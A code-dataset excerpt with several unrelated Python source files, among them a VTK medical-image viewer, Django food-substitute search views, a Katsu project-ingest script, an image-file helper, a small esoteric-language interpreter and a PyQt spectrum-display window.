dim1_sliderWidget_min:\n dim1_sliderWidget_min.GetRepresentation().SetValue(min(dim1_maxValue - 1, dim1_minValue))\n if dim2_minValue >= dim2_maxValue:\n if obj == dim2_sliderWidget_max:\n dim2_sliderWidget_max.GetRepresentation().SetValue(max(dim2_maxValue, dim2_minValue + 1))\n elif obj == dim2_sliderWidget_min:\n dim2_sliderWidget_min.GetRepresentation().SetValue(min(dim2_maxValue - 1, dim2_minValue))\n if dim3_minValue >= dim3_maxValue:\n if obj == dim3_sliderWidget_max:\n dim3_sliderWidget_max.GetRepresentation().SetValue(max(dim3_maxValue, dim3_minValue + 1))\n elif obj == dim3_sliderWidget_min:\n dim3_sliderWidget_min.GetRepresentation().SetValue(min(dim3_maxValue - 1, dim3_minValue))\n\n dim1_minValue = dim1_sliderWidget_min.GetRepresentation().GetValue()\n dim1_maxValue = dim1_sliderWidget_max.GetRepresentation().GetValue()\n dim2_minValue = dim2_sliderWidget_min.GetRepresentation().GetValue()\n dim2_maxValue = dim2_sliderWidget_max.GetRepresentation().GetValue()\n dim3_minValue = dim3_sliderWidget_min.GetRepresentation().GetValue()\n dim3_maxValue = dim3_sliderWidget_max.GetRepresentation().GetValue()\n\n # print(dim1_minValue, dim1_maxValue)\n # print(self.dims)\n #\n # print(self.extractVOI_src.GetOutput().GetDimensions())\n # print('update_crop')\n\n self.updateSlice([dim1_minValue, dim2_minValue, dim3_minValue,\n dim1_maxValue, dim2_maxValue, dim3_maxValue])\n\n dim1_sliderWidget_min, dim1_sliderWidget_max = getCropSlider(1, self.dims[0], self.render,\n self.renWinInteractor)\n dim2_sliderWidget_min, dim2_sliderWidget_max = getCropSlider(2, self.dims[1], self.render,\n self.renWinInteractor)\n dim3_sliderWidget_min, dim3_sliderWidget_max = getCropSlider(3, self.dims[2], self.render,\n self.renWinInteractor)\n\n dim1_sliderWidget_min.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)\n dim1_sliderWidget_max.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)\n dim2_sliderWidget_min.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)\n dim2_sliderWidget_max.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)\n dim3_sliderWidget_min.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)\n dim3_sliderWidget_max.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)\n\n dim1_sliderWidget_min.EnabledOn()\n dim1_sliderWidget_max.EnabledOn()\n dim2_sliderWidget_min.EnabledOn()\n dim2_sliderWidget_max.EnabledOn()\n dim3_sliderWidget_min.EnabledOn()\n dim3_sliderWidget_max.EnabledOn()\n\n def addSeg(self, numpyImage_seg, spacing=(1.0, 1.0, 1.0)):\n self.info.append(\"addSeg\")\n # print(\"add seg\")\n\n # numpyImage_seg = numpyImage_seg.astype(np.int)\n # for i, u in enumerate(np.unique(numpyImage_seg)):\n # numpyImage_seg[numpyImage_seg == u] = i\n # print(np.unique(numpyImage_seg))\n\n self.seg_arr.SetArray(numpyImage_seg.astype(np.float))\n self.seg_arr.SetDataSpacing(tuple(reversed(spacing)))\n self.seg_arr.SetDataOrigin((0, 0, 0))\n self.seg_arr.Update()\n\n tcfun_seg = vtk.vtkPiecewiseFunction()\n tcfun_seg.AddPoint(self.minGrayValue, 0.0)\n tcfun_seg.AddPoint(self.minGrayValue + 0.25, 0.0)\n tcfun_seg.AddPoint(self.maxGrayValue, self.segOpacity)\n\n gradtfun_seg = vtk.vtkPiecewiseFunction()\n gradtfun_seg.AddPoint(0.05, 0.8)\n gradtfun_seg.AddPoint(0.1, 0.9)\n gradtfun_seg.AddPoint(0.6, 1.0)\n # gradtfun_seg.AddPoint(1.0, 0.9)\n # gradtfun_seg.AddPoint(self.maxGrayValue, 1.1)\n\n ctfun_seg = vtk.vtkColorTransferFunction()\n ctfun_seg.AddRGBPoint(self.minGrayValue, 0.3, 0.6, 0.3)\n ctfun_seg.AddRGBPoint(self.maxGrayValue, 0.3, 0.6, 0.3)\n\n # outline = vtk.vtkOutlineFilter()\n # outline.SetInputConnection(self.seg_arr.GetOutputPort())\n # outlineMapper = vtk.vtkPolyDataMapper()\n # outlineMapper.SetInputConnection(outline.GetOutputPort())\n # outlineActor = vtk.vtkActor()\n # outlineActor.SetMapper(outlineMapper)\n\n self.extractVOI_seg.SetInputConnection(self.seg_arr.GetOutputPort())\n self.extractVOI_seg.SetVOI(0, self.dims[0] - 1, 0, self.dims[1] - 1, 0, self.dims[2] - 1)\n self.extractVOI_seg.Update()\n\n volumeMapper_seg = vtk.vtkGPUVolumeRayCastMapper()\n volumeMapper_seg.SetInputData(self.extractVOI_seg.GetOutput())\n\n self.volumeProperty_seg.SetColor(ctfun_seg)\n self.volumeProperty_seg.SetScalarOpacity(tcfun_seg)\n self.volumeProperty_seg.SetGradientOpacity(gradtfun_seg)\n self.volumeProperty_seg.SetInterpolationTypeToLinear()\n self.volumeProperty_seg.ShadeOn()\n\n render_volume_seg = vtk.vtkVolume()\n render_volume_seg.SetMapper(volumeMapper_seg)\n render_volume_seg.SetProperty(self.volumeProperty_seg)\n\n sliderRep_segOpacity = vtk.vtkSliderRepresentation2D()\n sliderRep_segOpacity.SetMinimumValue(0)\n sliderRep_segOpacity.SetMaximumValue(1)\n sliderRep_segOpacity.SetValue(self.segOpacity)\n # sliderRep_segOpacity.SetTitleText(\"seg opacity\")\n sliderRep_segOpacity.SetSliderLength(0.025)\n sliderRep_segOpacity.SetSliderWidth(0.05)\n sliderRep_segOpacity.SetEndCapLength(0.005)\n sliderRep_segOpacity.SetEndCapWidth(0.025)\n sliderRep_segOpacity.SetTubeWidth(0.0125)\n sliderRep_segOpacity.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()\n sliderRep_segOpacity.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()\n sliderRep_segOpacity.GetPoint1Coordinate().SetValue(0.15, 0.05)\n sliderRep_segOpacity.GetPoint2Coordinate().SetValue(0.85, 0.05)\n\n sliderWidget_segOpacity = vtk.vtkSliderWidget()\n sliderWidget_segOpacity.SetInteractor(self.renWinInteractor)\n sliderWidget_segOpacity.SetRepresentation(sliderRep_segOpacity)\n sliderWidget_segOpacity.SetCurrentRenderer(self.render)\n sliderWidget_segOpacity.SetAnimationModeToAnimate()\n\n def update_segopacity(obj, ev):\n self.segOpacity = sliderWidget_segOpacity.GetRepresentation().GetValue()\n\n self.volumeProperty_seg.GetScalarOpacity().AddPoint(self.maxGrayValue, self.segOpacity)\n\n sliderWidget_segOpacity.AddObserver(vtk.vtkCommand.InteractionEvent, update_segopacity)\n sliderWidget_segOpacity.EnabledOn()\n\n # self.render.AddActor(outlineActor)\n self.render.AddVolume(render_volume_seg)\n\n def updateGrayScale(self, minValue, maxValue):\n # print('update_minmax')\n self.currentMin, self.currentMax = minValue, maxValue\n for i in self.info:\n # print(i)\n if i == \"addGrayScaleSliderToRender\" and self.showImage:\n self.volumeProperty_src.GetScalarOpacity().RemoveAllPoints()\n self.volumeProperty_src.GetScalarOpacity().AddPoint(minValue, 0.0)\n self.volumeProperty_src.GetScalarOpacity().AddPoint(maxValue, 1.0)\n if i == \"addSliceToRender\":\n for sliceActor in self.slicesActors:\n sliceActor.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)\n sliceActor.GetProperty().SetColorWindow(maxValue - minValue)\n\n def updateSlice(self, crop):\n if self.slicesMappers:\n assert len(self.slicesMappers) == len(crop)\n for i, s in enumerate(crop):\n self.slicesMappers[i].SetSliceNumber(int(s))\n\n if \"addSrc\" in self.info:\n self.extractVOI_src.SetVOI(int(crop[0]), int(crop[3]),\n int(crop[1]), int(crop[4]),\n int(crop[2]), int(crop[5]))\n self.extractVOI_src.Update()\n\n if \"addSeg\" in self.info:\n self.extractVOI_seg.SetVOI(int(crop[0]), int(crop[3]),\n int(crop[1]), int(crop[4]),\n int(crop[2]), int(crop[5]))\n self.extractVOI_seg.Update()\n\n def keypressFun(self, obj, event):\n # print(self.info)\n key = self.renWinInteractor.GetKeySym().upper()\n # 键盘控制交互式操作\n # print(key)\n if key == 'L' and \"addSeg\" in self.info:\n if self.showLabel:\n # print('Hide Label')\n self.volumeProperty_seg.GetScalarOpacity().RemoveAllPoints()\n self.volumeProperty_seg.GetScalarOpacity().AddPoint(self.minGrayValue, 0.0)\n self.volumeProperty_seg.GetScalarOpacity().AddPoint(self.maxGrayValue, 0.0)\n else:\n # print('Show Label')\n self.volumeProperty_seg.GetScalarOpacity().RemoveAllPoints()\n self.volumeProperty_seg.GetScalarOpacity().AddPoint(self.minGrayValue, 0.0)\n self.volumeProperty_seg.GetScalarOpacity().AddPoint(self.minGrayValue + 0.5, 0.0)\n self.volumeProperty_seg.GetScalarOpacity().AddPoint(self.maxGrayValue, self.segOpacity)\n self.showLabel = not self.showLabel\n\n if key == 'S' and \"addSliceToRender\" in self.info:\n # print('Slice')\n for sliceActor in self.slicesActors:\n sliceActor.GetProperty().SetOpacity(1 - sliceActor.GetProperty().GetOpacity())\n\n if key == \"T\" and \"addSrc\" in self.info:\n if self.showImage:\n # print('Hide Image')\n self.volumeProperty_src.GetScalarOpacity().RemoveAllPoints()\n self.volumeProperty_src.GetScalarOpacity().AddPoint(self.minGrayValue, 0.0)\n self.volumeProperty_src.GetScalarOpacity().AddPoint(self.maxGrayValue, 0.0)\n else:\n # print('Show Image')\n self.volumeProperty_src.GetScalarOpacity().RemoveAllPoints()\n self.volumeProperty_src.GetScalarOpacity().AddPoint(self.currentMin, 0.0)\n self.volumeProperty_src.GetScalarOpacity().AddPoint(self.currentMax, 1.0)\n self.showImage = not self.showImage\n\n self.renWin.Render()\n return\n\n\ndef vtkWindowView(numpyImage, numpySeg=None, spacing=(1.0, 1.0, 1.0)):\n m = MedicalImageWindow()\n m.viewer.addSrc(numpyImage, spacing=spacing)\n if numpySeg is not None:\n m.viewer.addSeg(numpySeg, spacing)\n m.viewer.addGrayScaleSliderToRender()\n m.viewer.addSliceToRender()\n m.viewer.addCropSliderToRender()\n m.startWindow()\n\n\ndef vtkWindowViewNotebook(numpyImage, spacing=(1.0, 1.0, 1.0)):\n print('Running vtkWindowViewNotebook ...')\n import sys\n if os.path.exists(os.path.dirname(__file__) + '/tmp.pkl'):\n os.remove(os.path.dirname(__file__) + '/tmp.pkl')\n pickle.dump({'data': numpyImage, 'spacing': spacing}, open(os.path.dirname(__file__) + '/tmp.pkl', 'wb'))\n # print(os.path.dirname(__file__))\n os.system(f'{sys.executable} \\\"{os.path.dirname(__file__)}/tmp_func.py\\\" --mode 2')\n print('closing')\n","repo_name":"TimothyZero/MedVision","sub_path":"medvision/visulaize/vtkViewClass.py","file_name":"vtkViewClass.py","file_ext":"py","file_size_in_byte":27096,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"37"}
+{"seq_id":"70292508908","text":"from django.db.models import Count\nfrom django.db import IntegrityError\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom search.search_form import Searchbar\nfrom search.models.product import Product\nfrom search.models.category import Categories\nfrom search.models.substitute import Substitute\nfrom users.models import User\n\n\ndef home(request):\n search_bar = Searchbar()\n context = {\n \"searchbar\": search_bar\n }\n return render(request, 'search/home.html', context)\n\n\ndef products(request):\n if request.method == \"POST\":\n product_search = request.POST[\"product_search\"]\n products_obj = Product.objects.all().filter(\n name__contains=product_search.strip().lower().capitalize()\n )[:6]\n print(products_obj)\n context = {\n # title in HTML will contain value of product_search\n \"title\": product_search,\n \"products\": products_obj,\n }\n print(context)\n # send context to products.html template and render this template\n return render(request, \"search/products.html\", context)\n\n\ndef product(request, product_id):\n \"\"\"Displays the product details page\n Args:\n request: base parameter\n product_id (int): Id of the product\n \"\"\"\n # try:\n product_obj = Product.objects.get(pk=product_id)\n context = {\"product\": product_obj}\n # except Product.DoesNotExist:\n print(context)\n return render(request, \"search/product.html\", context)\n\n\ndef substitutes(request, product_id):\n \"\"\" Display substitutes from selected product\"\"\"\n # Find product searched by user with id\n product_query = Product.objects.get(pk=product_id)\n\n # Find the category of the product\n product_query_cat = Categories.objects.filter(product__id=product_query.id)\n\n # Find 9 products with better nutrition_score in the same category\n substitutes_prod = (\n Product.objects.filter(category__in=product_query_cat)\n .annotate(nb_cat=Count(\"category\"))\n .filter(nb_cat__gte=3)\n .filter(nutrition_score__lt=product_query.nutrition_score)\n .order_by(\"nutrition_score\")[:9]\n )\n\n context = {\"product\": product_query, \"substitutes\": substitutes_prod}\n\n return render(request, \"search/substitutes.html\", context)\n\n\n@login_required\ndef save_favorite(request, product_id, substitute_id):\n \"\"\" save the product and the substitute chosen for the user \"\"\"\n product_query = Product.objects.get(pk=product_id)\n substitute_query = Product.objects.get(pk=substitute_id)\n user = User.objects.get(pk=request.user.id)\n favorite = Substitute(product_id_id=product_query.id, substitute_id_id=substitute_query.id, user_id_id=user.id)\n try:\n favorite.save()\n return redirect(\"search:favorites\")\n except IntegrityError:\n return redirect(\"search:home\")\n\n\n@login_required\ndef favorites(request):\n \"\"\"Display Favorites page of the user\"\"\"\n favorites_prod = Substitute.objects.filter(user_id_id=request.user.id)\n context = {\n \"favorites\": favorites_prod\n }\n return render(request, \"search/favorites.html\", context)\n\n\ndef legal_notice(request):\n return render(request, \"search/legal_notice.html\")\n","repo_name":"Blankxx420/P11_Healthyfoodchoice_V2","sub_path":"search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"21344287326","text":"import sys\nimport argparse\nimport requests\n\n\"\"\"\nAn ingest script that automates the initial data ingest for katsu service.\n\nNote that you should run this script with Katsu's virtualenv activated.\n\"\"\"\n\ndef create_project(katsu_server_url: str, project_title: str) -> str:\n \"\"\"\n Create a new Katsu project.\n\n Return the uuid of the newly-created project.\n \"\"\"\n\n project_request = {\n \"title\": project_title,\n \"description\": \"A new project.\"\n }\n\n try:\n r = requests.post(katsu_server_url + \"/api/projects\", json=project_request)\n except requests.exceptions.ConnectionError:\n print(\n \"Connection to the API server {} cannot be established.\".format(\n katsu_server_url\n )\n )\n sys.exit()\n\n if r.status_code == 201:\n project_uuid = r.json()[\"identifier\"]\n return project_uuid\n elif r.status_code == 400:\n print(\n \"Something else went wrong. It might be that your a table with the same name already exists or that your table name is too short.\"\n )\n sys.exit()\n else:\n print(r.json())\n sys.exit()\n\ndef main():\n \"\"\"\n Driver function for script.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"A script that facilitates initial data ingestion of Katsu service.\")\n\n parser.add_argument(\"project_name\", help=\"Project name.\")\n parser.add_argument(\"server_url\", help=\"The URL of Katsu Instance.\")\n\n args = parser.parse_args()\n project_name = str.strip(args.project_name)\n katsu_server_url = str.strip(args.server_url)\n\n project_uuid = create_project(katsu_server_url, project_name)\n print(project_uuid)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CanDIG/federated-learning","sub_path":"ingestion-scripts/internal/create_proj.py","file_name":"create_proj.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"9387070612","text":"from django.urls import path\n\nfrom .views import (\n register_view,\n login_view,\n logout_view,\n profile_view,\n update_profile_view,\n follow_unfollow_user_view,\n)\n\napp_name = \"account\"\n\n\nurlpatterns = [\n path(\"register/\", register_view, name=\"register\"),\n path(\"login/\", login_view, name=\"login\"),\n path(\"logout/\", logout_view, name=\"logout\"),\n path(\"profile/\", profile_view, name=\"profile\"),\n path(\"profile/update/\", update_profile_view, name=\"update\"),\n path(\"user/fl_unfl/\", follow_unfollow_user_view, name=\"fl_unfl\")\n]","repo_name":"Dasifue/PyStagram","sub_path":"account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"35883920313","text":"import os\nfrom PIL import Image\nfrom datetime import datetime\n\n\nclass LibImage:\n\n @staticmethod\n def get_image_stat(image_path):\n with Image.open(image_path) as im:\n width, height = im.size\n dict_info = im._getexif()\n date_info = None\n if dict_info is not None and 36867 in dict_info:\n date_info = datetime.strptime(dict_info[36867], \"%Y:%m:%d %H:%M:%S\")\n\n return date_info, width, height\n\n @staticmethod\n def get_all_media_from_folder(from_file_location_dir):\n out_files = []\n for root_dir, dir_names, file_names in os.walk(from_file_location_dir):\n for file_name in file_names:\n ext = os.path.splitext(file_name)[1].lower()\n if ext in [\".jpg\", \".jpeg\", \".png\", # all images\n \".mp4\", \".avi\"]: # all vedio\n file_path = os.path.join(root_dir, file_name)\n out_files.append(file_path)\n return out_files\n\n @staticmethod\n def helper_is_file_image(file_path):\n ext = os.path.splitext(file_path)[1].lower()\n return ext in [\".jpg\", \".jpeg\", \".png\"]\n\n @staticmethod\n def helper_is_file_vid(file_path):\n ext = os.path.splitext(file_path)[1].lower()\n return ext in [\".mp4\", \".avi\"]\n\n\n\n\n\n\n","repo_name":"aryakal/libs","sub_path":"libImage.py","file_name":"libImage.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"13359633121","text":"#Create a function that returns the indices of all occurrences of an item in the list.\n\n#Examples\n#get_indices([\"a\", \"a\", \"b\", \"a\", \"b\", \"a\"], \"a\") ➞ [0, 1, 3, 5]\n\n\n\ndef get_indices(lst, el):\n\tout_list = []\n\tfor i, x in enumerate(lst):\n\t\tif x == el:\n\t\t\tout_list.append(i)\n\treturn out_list\t\t\n\n\nprint(get_indices([\"a\", \"a\", \"b\", \"a\", \"b\", \"a\"],\"a\"))","repo_name":"adambatchelor2/python","sub_path":"Edabit_02012020_IndiciesInList.py","file_name":"Edabit_02012020_IndiciesInList.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"72697515307","text":"import secrets\r\nimport time\r\nimport sys\r\n\r\n\r\ndef run(code):\r\n bit = ind = 0\r\n vel = new = 1\r\n\r\n while ind < len(code):\r\n sym = code[ind]\r\n if sym == '^':\r\n bit ^= 1\r\n elif sym == '!':\r\n print(bit, end='')\r\n new = 0\r\n elif sym == '?':\r\n val = input('\\nInput: '[new:])\r\n bit = (not val) + 0\r\n new = 1\r\n elif sym == '@':\r\n bit = secrets.randbelow(2)\r\n elif sym == '&' and bit:\r\n ind += vel\r\n elif sym == '#':\r\n return\r\n elif sym == '<':\r\n ind = -vel\r\n elif sym == '/':\r\n vel *= -1\r\n elif sym == '_':\r\n time.sleep(1)\r\n\r\n ind += vel\r\n\r\n\r\nif __name__ == '__main__':\r\n if len(sys.argv) > 1:\r\n with open(sys.argv[1]) as file:\r\n data = file.read()\r\n run(data)\r\n","repo_name":"bangyen/esolangs","sub_path":"register-based/lightlang.py","file_name":"lightlang.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"}
+{"seq_id":"14522856369","text":"from mwui import Ui_MainWindow\nfrom PyQt5.QtWidgets import QMainWindow, QFileDialog, QVBoxLayout, QHBoxLayout, \\\n QHeaderView,QAbstractItemView, QMessageBox, QTableWidgetItem\nfrom PyQt5.QtCore import QThread, QTimer,pyqtSignal\nfrom PyQt5.QtGui import QIcon\nimport PyQt5.QtCore\n\nfrom DataHandler import DataHandler\nfrom DataReader import DataReader\n\nfrom PyQt5.QtWidgets import QAction, QMenu, QTableWidget, QGraphicsAnchorLayout, QToolButton\nfrom PyQt5.QtCore import Qt\nimport PyQt5.QtGui as gui\nfrom PyQt5.QtGui import QBrush, QColor, QPixmap\n\nfrom startform import StartFrom\n\nclass MW(QMainWindow, Ui_MainWindow):\n\n start_sig = pyqtSignal()\n stop_signal = pyqtSignal()\n exit_sig = pyqtSignal()\n\n del_marker_sig = pyqtSignal(int)\n add_markerpeak_sig = pyqtSignal()\n clear_mid_sig = pyqtSignal()\n\n def showInfoMe(self):\n from InfoMe import InfoMe\n self.inf = InfoMe()\n self.inf.show()\n\n def showMeasAll(self):\n self.measWid.tabWidget.setCurrentIndex(0)\n self.measWid.setMinimumSize(0, 150)\n self.measWid.setMaximumSize(1e5, 150)\n\n def genToolTipStyle(self, ptr):\n ptr.setStyleSheet(\"QToolTip { \\\n font-size:9pt; \\\n color:white; padding:2px; \\\n border-width:2px;\\\n border-style:solid;\\\n border-radius:20px;\\\n background-color: black;\\\n border: 1px solid white;}\")\n\n\n\n def readConf(self):\n\n from PyQt5.QtWidgets import QLineEdit, QCheckBox, QRadioButton, QComboBox\n\n try:\n f = open('conf.conf', 'r')\n\n for line in f:\n line = line.replace('\\n', '')\n\n line = line.split('\\t')\n\n if len(line) == 2: line.append('')\n\n name, typ, val = line\n\n\n if typ == 'QLineEdit':\n obj = self.startWid.findChildren(QLineEdit, name)[0]\n obj.setText(val)\n elif typ == 'QCheckBox':\n obj = self.startWid.findChildren(QCheckBox, name)[0]\n obj.setChecked(int(val))\n elif typ == 'QRadioButton':\n obj = self.startWid.findChildren(QRadioButton, name)[0]\n obj.setChecked(int(val))\n elif typ == 'QComboBox':\n obj = self.startWid.findChildren(QComboBox, name)[0]\n obj.setCurrentIndex(int(val))\n\n\n except:\n print('No conf file')\n\n def saveConf(self):\n\n from PyQt5.QtWidgets import QLineEdit, QCheckBox, QRadioButton, QComboBox\n\n listLine = self.startWid.findChildren(QLineEdit)\n listCheck = self.startWid.findChildren(QCheckBox)\n listRadio = self.startWid.findChildren(QRadioButton)\n listCombo = self.startWid.findChildren(QComboBox)\n\n\n f = open('conf.conf', 'w')\n\n for t in listLine:\n if not 'qt_' in t.objectName():\n f.write(t.objectName() + '\\tQLineEdit\\t'+ t.text() + '\\n')\n\n for t in listCheck:\n if not 'qt_' in t.objectName():\n if t.isChecked():\n val = 1\n else:\n val = 0\n f.write(t.objectName() + '\\tQCheckBox\\t' + str(val)+ '\\n')\n\n for t in listRadio:\n if not 'qt_' in t.objectName():\n if t.isChecked():\n val = 1\n else:\n val = 0\n f.write(t.objectName() + '\\tQRadioButton\\t' + str(val) + '\\n')\n\n for t in listCombo:\n if not 'qt_' in t.objectName():\n f.write(t.objectName() + '\\tQComboBox\\t' + str(t.currentIndex())+ '\\n')\n\n f.close()\n\n def initMenu(self):\n\n self.btnRun = QAction(QIcon(\"icon/n.png\"), \"actRun\", self)\n self.btnUpd = QAction(QIcon(\"icon/r.png\"), \"actUpd\", self)\n self.btnStop = QAction(QIcon(\"icon/s.png\"), \"actStop\", self)\n self.btnInfo = QAction(QIcon(\"icon/i.png\"), \"actStop\", self)\n\n self.btnConf = QAction(QIcon(\"icon/config.png\"), \"act1\", self)\n\n self.btnRun.setToolTip('Считать последовательно')\n self.btnUpd.setToolTip('Считать при изменении')\n\n self.btnStop.setToolTip('Остановить')\n self.btnInfo.setToolTip('Информация')\n self.btnConf.setToolTip('Настройка')\n\n self.toolbar = self.addToolBar(\"Run\")\n\n\n\n menu = QMenu()\n act1 = menu.addAction('Дельта-маркеры')\n act1.triggered.connect(self.showMeasAll)\n\n # -----\n\n\n # ----\n\n self.measTool = QToolButton(self.toolbar)\n self.measTool.setPopupMode(QToolButton.InstantPopup)\n self.measTool.setIcon(QIcon(\"icon/m.png\"))\n self.measTool.setMenu(menu)\n\n self.measTool.setToolTip('Измерения')\n\n self.toolbar.addAction(self.btnRun)\n self.toolbar.addAction(self.btnUpd)\n self.toolbar.addAction(self.btnStop)\n self.toolbar.addAction(self.btnConf)\n self.toolbar.addWidget(self.measTool)\n self.toolbar.addAction(self.btnInfo)\n\n self.genToolTipStyle(self.toolbar)\n\n self.btnRun.triggered.connect(self.actionRun)\n self.btnUpd.triggered.connect(self.actionUpd)\n self.btnStop.triggered.connect(self.actionStop_)\n self.btnInfo.triggered.connect(self.showInfoMe)\n self.btnConf.triggered.connect(self.acttionConfig)\n\n def acttionConfig(self):\n self.stopClicked()\n self.hide()\n self.startWid.show()\n\n def clearAllMark(self):\n table = self.newTableMark\n while table.rowCount():\n self.markerClickSlot(0, 4)\n\n def markerClickSlot(self, row, col):\n if col == 4:\n table = self.newTableMark\n id = int(table.item(row, 0).text().replace('M', ''))\n self.del_marker_sig.emit(id)\n table.removeRow(row)\n\n\n def stringCutter(self, str, cnt=3):\n pass\n\n def updateValsSlot(self, ID, freq, amp, width):\n freq = round(freq, 1)\n amp = int(amp)\n\n table = self.newTableMark\n\n for i in range(table.rowCount()):\n _id = int(table.item(i, 0).text().replace('M', ''))\n if _id == ID:\n\n if not table.item(_id, 3):\n return\n\n table.item(_id, 1).setText(str(freq))\n table.item(_id, 2).setText(str(amp))\n\n if width:\n table.item(_id, 5).setText('Width:' + str(width))\n else:\n table.item(_id, 5).setText('')\n\n break\n\n def stringCut(self, st, max):\n pass\n\n def addMarkerClickSlot(self, chanN, freq, amp, ID):\n table = self.newTableMark\n newID = table.rowCount()\n table.setRowCount(newID + 1)\n\n item = QTableWidgetItem()\n item.setText('M' + str(ID))\n table.setItem(newID, 0,item)\n\n freq = round(freq, 1)\n\n #amp = round(amp, 1)\n\n\n table.setItem(newID, 1, QTableWidgetItem(str(freq)))\n\n\n amp = int(amp)\n item = QTableWidgetItem()\n item.setText(str(amp))\n table.setItem(newID, 2, item)\n\n\n\n item = QTableWidgetItem()\n item.setText('Канал №' + str(chanN))\n item.setForeground(QBrush(QColor(self.colorsByInd[chanN][0],\\\n self.colorsByInd[chanN][1], self.colorsByInd[chanN][2])))\n table.setItem(newID, 3, item)\n\n item = QTableWidgetItem()\n item.setIcon(QIcon('icon/delete.png'))\n table.setItem(newID, 4, item)\n\n item = QTableWidgetItem()\n table.setItem(newID, 5, item)\n\n # item.setForeground(QBrush(QColor(0, 255, 0)))\n\n def initNewMark(self):\n self.newTableMark = QTableWidget(self.specWid.graphicsView)\n table = self.newTableMark\n\n # border: 0px solid #333333;\n\n table.setStyleSheet(\"QTableWidget { border: none;\"\n \" background-color: transparent; }\"\n \"QHeaderView::section {background-color: transparent;}\"\n \"QHeaderView {background-color: transparent;}\"\n \"QTableCornerButton::section {background-color: transparent;}\")\n\n table.cellClicked.connect(self.markerClickSlot)\n\n table.setShowGrid(False)\n\n table.setColumnCount(6)\n table.setRowCount(0)\n\n table.horizontalHeader().hide()\n table.verticalHeader().hide()\n\n table.resize(350, 290)\n table.move(60, 30)\n\n table.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)\n\n table.setFocusPolicy(Qt.NoFocus)\n table.setEditTriggers(gui.QAbstractItemView.NoEditTriggers)\n\n self.osclegTableWidget.setEditTriggers(gui.QAbstractItemView.NoEditTriggers)\n self.osclegTableWidget.setSelectionMode(gui.QAbstractItemView.NoSelection)\n\n from PyQt5.QtGui import QFont\n font = QFont(\"times\", 10)\n font.setBold(True)\n table.setFont(font)\n\n table.setColumnWidth(1, 50)\n\n table.setColumnWidth(3, 400)\n table.setColumnWidth(4, 10)\n\n\n self.colorsByInd = {\n 0 : (255,0,0),\n 1 : (0,255,0),\n 2 : (0,0,255),\n 3 : (255,255,0),\n 4 : (0,255,255),\n 5 : (255,0,255),\n 6 : (128,128,0),\n 7 : (128,0,128)\n }\n\n def actionRun(self):\n self.mode = 'step'\n self.startClicked()\n\n def actionUpd(self):\n self.mode = 'check'\n self.startClicked()\n\n def actionStop_(self):\n self.stopClicked()\n\n def test(self):\n print(1)\n\n def generateLegendInit(self):\n table1 = self.speclegTableWidget\n table2 = self.osclegTableWidget\n tables = [table1, table2]\n\n for table in tables:\n\n table.verticalHeader().setVisible(False)\n table.setColumnCount(1)\n table.setHorizontalHeaderLabels(['Список каналов'])\n table.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n\n table1.cellClicked.connect(self.tableSpecClick)\n table1.setEditTriggers(QAbstractItemView.NoEditTriggers)\n table1.setSelectionMode(QAbstractItemView.NoSelection)\n\n self.currChannel = None\n\n def tableSpecClick(self, row, col):\n table = self.speclegTableWidget\n\n for i in range(table.rowCount()):\n text = table.item(i, 0).text()\n text = text.replace(' (активный)', '')\n table.item(i, 0).setText(text)\n\n if not table.rowCount():\n return\n\n text = table.item(row, 0).text()\n text = text + ' (активный)'\n table.item(row, 0).setText(text)\n\n self.setActiveChanel(row)\n\n def generateLegend(self, chanN):\n from PyQt5.QtGui import QColor\n\n table1 = self.speclegTableWidget\n table2 = self.osclegTableWidget\n tables = [table1, table2]\n\n colors = self.specWid.colorsByInd\n\n for table in tables:\n table.setRowCount(chanN)\n\n for i in range(chanN):\n item = QTableWidgetItem()\n item.setText('Канал №' + str(i))\n\n qcolor = QColor()\n qcolor.setRgb(colors[i][0], colors[i][1], \\\n colors[i][2])\n\n item.setBackground(qcolor)\n\n table.setItem(i, 0, item)\n\n def setActiveChanel(self, chanN):\n self.chanN = chanN\n self.specWid.setCurrChan(chanN)\n\n def clearActiveChan(self):\n self.chanN = None\n\n\n def specCntPushButtonClicked(self):\n self.oscWid.setOscLen(self.SPEC_cntSpinBox.value())\n\n def drawOscCheckBoxToggl(self):\n self.handler.setOscEn(self.drawOscCheckBox.isChecked())\n\n def __init__(self):\n super(MW, self).__init__()\n self.setupUi(self)\n\n from MeasClass import MeasClass\n self.measWid = MeasClass()\n\n self.initUI()\n\n\n\n\n\n # newmark__\n self.specWid.add_marker_sig.connect(self.addMarkerClickSlot)\n self.specWid.update_marker_sig.connect(self.updateValsSlot)\n self.del_marker_sig.connect(self.specWid.delMarkerSlot)\n self.markerPeakPushButton.clicked.connect(self.specWid.addMarkerPeak)\n # ----\n\n self.specWid.error_sig.connect(self.showError)\n\n 